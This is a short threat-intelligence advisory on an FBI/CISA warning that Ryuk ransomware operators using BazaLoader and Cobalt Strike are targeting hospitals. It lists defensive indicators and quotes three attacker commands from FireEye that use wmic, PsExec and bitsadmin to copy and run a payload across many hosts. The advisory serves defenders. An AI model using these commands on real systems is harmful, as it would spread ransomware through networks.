In a joint statement, the FBI and CISA are warning the healthcare industry that threat actors utilizing Ryuk Ransomware are actively targeting hospitals and healthcare providers. This announcement follows a recent attribution announcement of attacks made against the healthcare industry by UNC1878 according to FireEye/Mandiant as reported by BleepingComputer. In recent months, BazaLoader has been utilized with the initial phishing campaigns and loading of BazarBackdoor, giving the threat actors the access they need to deploy Cobalt Strike beacon, escalate privileges to administrator, and eventually deploy Ryuk across the enterprise.
The rapid movement of these operators allows little time for defenders to respond after BazaLoader has been discovered. It should be noted that in the joint government announcement, TTPs for Trickbot and Ryuk are mentioned but in light of recent activity according to FireEye/Mandiant, there is a high likelihood that BazaLoader will be used.
Analyst Notes
With the recent disclosures, organizations in healthcare must understand the threat against them as it stands right now. Understanding the mechanisms of how BazaLoader, BazarBackdoor, and Ryuk operate will enable defenders to know what to triage and isolate first. If a host has signs of ransomware on the host, shut it down as soon as possible to prevent further spread. BazaLoader is extremely quiet on a system but can leave some artifacts to be investigated further, as detailed below.
BazaLoader:
Scheduled Task Name: Start
Bitsadmin:
Look for jobs attempting to make outbound network connections to domains/IPs that you do not have any association with.
Ryuk (FireEye) :
start wmic /node:@C:share$comps1.txt /user:[REDACTED] /password:[REDACTED] process call create “cmd.exe /c bitsadmin /transfer vVv \[REDACTED]share$vVv.exe %APPDATA%vVv.exe & %APPDATA%vVv.exe”
start PsExec.exe /accepteula @C:share$comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY “\[REDACTED]share$vVv.exe” “C:windowstempvVv.exe”
start PsExec.exe -d @C:share$comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:windowstempvVv.exe
Resources:
https://us-cert.cisa.gov/ncas/alerts/aa20-302a
https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
